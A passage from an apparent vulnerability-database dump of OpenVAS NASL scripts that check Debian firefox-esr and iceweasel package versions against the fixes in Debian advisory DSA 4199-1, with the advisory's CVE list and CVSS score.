isdpkgvuln(pkg:\"firefox-esr-l10n-ms\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-nb-no\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-nl\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-nn-no\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-or\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-pa-in\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-pl\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-pt-br\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-pt-pt\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-rm\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ro\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ru\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-si\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-sk\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-sl\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-son\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-sq\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-sr\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-sv-se\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ta\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-te\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-th\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-tr\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-uk\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-uz\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-vi\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-xh\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-zh-cn\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-zh-tw\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-dbg\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-dev\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ach\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-af\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-all\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-an\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ar\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-as\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ast\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-az\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-be\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-bg\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-bn-bd\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-bn-in\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-br\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-bs\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ca\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-cak\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-cs\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-cy\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-da\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-de\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-dsb\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-el\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-en-gb\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-en-za\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-eo\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-es-ar\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-es-cl\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-es-es\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-es-mx\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-et\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-eu\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-fa\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ff\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-fi\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-fr\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-fy-nl\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ga-ie\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-gd\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-gl\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-gn\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-gu-in\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-he\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-hi-in\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-hr\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-hsb\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-hu\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-hy-am\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-id\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-is\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-it\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ja\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ka\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-kab\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-kk\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-km\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-kn\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ko\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-lij\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-lt\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-lv\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-mai\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-mk\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ml\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-mr\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ms\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-nb-no\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-nl\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-nn-no\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-or\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-pa-in\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-pl\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-pt-br\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-pt-pt\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-rm\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ro\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ru\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-si\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-sk\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-sl\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-son\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-sq\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-sr\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-sv-se\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ta\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-te\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-th\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-tr\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-uk\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-uz\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-vi\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-xh\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-zh-cn\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-zh-tw\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-04T18:56:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-5150", "CVE-2018-5178", "CVE-2018-5155", "CVE-2018-5183", "CVE-2018-5157", "CVE-2018-5154", "CVE-2018-5168", "CVE-2018-5158", "CVE-2018-5159"], "description": "Several security issues have been found in the Mozilla Firefox web\nbrowser: Multiple memory safety errors and other implementation errors\nmay lead to the execution of arbitrary code or denial of service.", "modified": "2019-07-04T00:00:00", "published": "2018-05-10T00:00:00", "id": "OPENVAS:1361412562310704199", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704199", "type": "openvas", "title": "Debian Security Advisory DSA 4199-1 (firefox-esr - security update)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Auto-generated from advisory DSA 4199-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704199\");\n script_version(\"2019-07-04T09:25:28+0000\");\n script_cve_id(\"CVE-2018-5150\", \"CVE-2018-5154\", \"CVE-2018-5155\", \"CVE-2018-5157\", \"CVE-2018-5158\",\n \"CVE-2018-5159\", \"CVE-2018-5168\", \"CVE-2018-5178\", \"CVE-2018-5183\");\n script_name(\"Debian Security Advisory DSA 4199-1 (firefox-esr - security update)\");\n script_tag(name:\"last_modification\", value:\"2019-07-04 09:25:28 +0000 (Thu, 04 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-05-10 00:00:00 +0200 (Thu, 10 May 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2018/dsa-4199.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB[89]\");\n script_tag(name:\"affected\", value:\"firefox-esr on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution (jessie), these problems have been fixed\nin version 52.8.0esr-1~deb8u1.\n\nFor the stable distribution (stretch), these problems have been fixed in\nversion 52.8.0esr-1~deb9u1.\n\nWe recommend that you upgrade your firefox-esr packages.\");\n\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/firefox-esr\");\n script_tag(name:\"summary\", value:\"Several security issues have been found in the Mozilla Firefox web\nbrowser: Multiple memory safety errors and other implementation errors\nmay lead to the execution of arbitrary code or denial of service.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-dev\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ach\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-af\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-all\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-an\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ar\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-as\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ast\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-az\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-bg\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-bn-bd\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-bn-in\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-br\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-bs\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ca\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-cak\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-cs\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-cy\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-da\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-de\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-dsb\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-el\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-en-gb\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-en-za\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-eo\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-es-ar\", ver:\"52.8.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += 